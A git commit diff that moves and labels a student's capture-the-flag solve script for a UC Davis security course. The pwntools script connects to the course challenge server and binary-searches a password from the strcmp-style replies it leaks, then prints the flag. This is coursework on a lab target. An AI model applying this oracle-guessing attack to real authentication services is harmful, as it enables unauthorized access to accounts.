commit 3298505503c729c57ac814b9cd9f71a5442d2d00
parent 3500dba57127a1d67d991cbb3098e28b0ae1b3f5
Author: therealFIGBERT <figbertwelner@gmail.com>
Date: Sun, 5 Jan 2020 15:44:56 -0800
Move third_flag.py to linux_and_misc/scripts/strcmp.py and add header to the file
Diffstat:
2 files changed, 89 insertions(+), 83 deletions(-)
diff --git a/linux_and_misc/scripts/strcmp.py b/linux_and_misc/scripts/strcmp.py
@@ -0,0 +1,89 @@
+# A CTF exploit by FIGBERT
+# for UC Davis class ECS189M
+# twinpeaks.cs.ucdavis.net:30004
+# Category: Linux and miscellaneous
+# Challenge: strcmp
+# 05/01/2020
+from pwn import *
+
+def string_to_integer(s: str) -> int:
+ """Returns the passed string's (b26, a-z) base10 value
+
+ Keyword arguments:
+ s -- the string to convert to an int
+ """
+ #Converts the characters to ascii representations (a=0, z=25)
+ num_values = [(ord(char)-97) for char in s][::-1]
+ lst = []
+ #Converts the number representation in the list to its base10 value
+ for pos, val in enumerate(num_values):
+ lst.append(val*(26**pos))
+ #Return the sum of the character values in base10
+ return sum(lst)
+
+def integer_to_string(num: int, max: int = 19) -> str:
+ """Returns the passed base10 int's string representation
+
+ Keyword arguments:
+ num -- the int to convert to a string
+ max -- the length of the string minus one
+ """
+ alphabetized_input = ""
+ for a in range(max,0,-1):
+ #Divides the number to get an int (0-25/a-z)
+ digit = int(num/(26**a)) if int(num/(26**a)) <= 25 else 25
+ #Converts the number to the corresponding letter
+ corresponding_character = chr(digit+97)
+ #Adds the new character to the total string
+ alphabetized_input += corresponding_character
+ num -= digit*(26**a)
+ corresponding_character = chr(int(num)+97)
+ alphabetized_input += corresponding_character
+ return alphabetized_input
+
+def passgen(low: str, high: str, size: int = 19) -> str:
+ """
+ Returns the string in the middle of `low` and `high`
+
+ Keyword arguments:
+ low -- the least string
+ high -- the highest string
+ size -- the length of the strings
+ """
+ return integer_to_string((string_to_integer(low)+string_to_integer(high))//2, size)
+
+cracked = False
+first_attempt = True
+LO = "aaaaaaaaaaaaaaaaaaaa"
+HI = "zzzzzzzzzzzzzzzzzzzz"
+connection = remote("twinpeaks.cs.ucdavis.edu", 30004)
+while not cracked:
+ #First run case
+ if first_attempt:
+ #Generates a password
+ password = passgen(LO, HI)
+ #Prints challenge
+ print(str(connection.recv(), "utf-8"))
+ #Sends and prints the password
+ connection.sendline(password)
+ print("Password: %s"%password)
+ first_attempt = False
+ else:
+ response = connection.recvline()
+ previous_pass = password
+ #Checks the response to perform binary search
+ if b" -1 " in response: #Password too small
+ LO = password
+ password = passgen(LO, HI)
+ elif b" 1 " in response: #Password too large
+ HI = password
+ password = passgen(LO, HI)
+ else: #Password cracked
+ cracked = True
+ break
+ connection.sendline(password)
+ print("Password: %s"%password)
+ connection.recvline()
+print("Flag: %s\n"%str(connection.recvline(), "utf-8").strip())
+
+connection.close()
diff --git a/third_flag.py b/third_flag.py
@@ -1,83 +0,0 @@
-from pwn import *
-
-def string_to_integer(s: str) -> int:
- """Returns the passed string's (b26, a-z) base10 value
-
- Keyword arguments:
- s -- the string to convert to an int
- """
- #Converts the characters to ascii representations (a=0, z=25)
- num_values = [(ord(char)-97) for char in s][::-1]
- lst = []
- #Converts the number representation in the list to its base10 value
- for pos, val in enumerate(num_values):
- lst.append(val*(26**pos))
- #Return the sum of the character values in base10
- return sum(lst)
-
-def integer_to_string(num: int, max: int = 19) -> str:
- """Returns the passed base10 int's string representation
-
- Keyword arguments:
- num -- the int to convert to a string
- max -- the length of the string minus one
- """
- alphabetized_input = ""
- for a in range(max,0,-1):
- #Divides the number to get an int (0-25/a-z)
- digit = int(num/(26**a)) if int(num/(26**a)) <= 25 else 25
- #Converts the number to the corresponding letter
- corresponding_character = chr(digit+97)
- #Adds the new character to the total string
- alphabetized_input += corresponding_character
- num -= digit*(26**a)
- corresponding_character = chr(int(num)+97)
- alphabetized_input += corresponding_character
- return alphabetized_input
-
-def passgen(low: str, high: str, size: int = 19) -> str:
- """
- Returns the string in the middle of `low` and `high`
-
- Keyword arguments:
- low -- the least string
- high -- the highest string
- size -- the length of the strings
- """
- return integer_to_string((string_to_integer(low)+string_to_integer(high))//2, size)
-
-cracked = False
-first_attempt = True
-LO = "aaaaaaaaaaaaaaaaaaaa"
-HI = "zzzzzzzzzzzzzzzzzzzz"
-connection = remote("twinpeaks.cs.ucdavis.edu", 30004)
-while not cracked:
- #First run case
- if first_attempt:
- #Generates a password
- password = passgen(LO, HI)
- #Prints challenge
- print(str(connection.recv(), "utf-8"))
- #Sends and prints the password
- connection.sendline(password)
- print("Password: %s"%password)
- first_attempt = False
- else:
- response = connection.recvline()
- previous_pass = password
- #Checks the response to perform binary search
- if b" -1 " in response: #Password too small
- LO = password
- password = passgen(LO, HI)
- elif b" 1 " in response: #Password too large
- HI = password
- password = passgen(LO, HI)
- else: #Password cracked
- cracked = True
- break
- connection.sendline(password)
- print("Password: %s"%password)
- connection.recvline()
-print("Flag: %s\n"%str(connection.recvline(), "utf-8").strip())
-
-connection.close()
